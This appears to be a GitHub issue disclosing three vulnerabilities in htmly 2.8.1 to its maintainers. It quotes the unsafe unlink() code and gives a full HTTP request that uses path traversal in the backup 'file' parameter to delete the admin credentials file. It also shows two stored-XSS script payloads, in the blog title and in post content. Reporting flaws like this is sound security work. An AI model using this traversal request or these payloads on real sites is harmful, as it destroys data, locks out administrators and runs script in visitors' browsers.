Skip to content

Arbitrary file deletion and Persistent XSS exists on htmly 2.8.1 #481

Closed
@fuzz7j

Description

@fuzz7j

1. An Arbitrary file deletion vulnerability in the backend

In htmly-2.8.1\system\admin\views\backup.html.php
line 7

if (!empty($file)) {
    unlink("backup/$file");
}

When we delete our backup files, we can delete any files on the system through directory traversal.
delFile1

example:
When we login, we can go to setting -> backup -> Creat back, then we client delete, we can get a link. when we modify the file field to /config/users/admin.ini and submit.

GET /admin/backup?file=../config/users/admin.ini&submit=Delete HTTP/1.1
Host: 10.211.55.3:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.211.55.3:8888/admin/backup
Cookie: CSRF_TOKEN=ncDpMG6sz9cWAhPp; kodUserID=1; __51uvsct__JH8lWQvr8bXXIzV9=2; __51vcke__JH8lWQvr8bXXIzV9=c469
5bd5-02b6-5295-974b-e8ddcfdf0022; __51vuft__JH8lWQvr8bXXIzV9=1625743826644; HOST=http%3A//10.211.55.3%3A88/; APP_HOST=http%3A//10.211.55.3%3A88/; kodUserLanguage=zh-CN; kodVersionCheck=check-at-1625809444; X-CSRF-TOKEN=m655d6hVx8EiMrw2nNue; PHPSESSID=4pau0op8l24alsd5sps034a4l2
Upgrade-Insecure-Requests: 1

The administrator information has been deleted and no one can login to the system.

2. Persistent XSS on Blog title

Since the Blog title is not processed by htmlentities
blogtitleXss3
when we modify the Blog title to <script>alert(/test/)</script>, Javascript is executed.
blogtitleXss1
blogtitleXss2

3. Persistent XSS on Creating regular blog post.

When we Creating regular blog post. Enter in Content
</div><script>alert(/xxx/)</script> and visit this article, Javascript is executed.
contentXss1
contentXss2

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions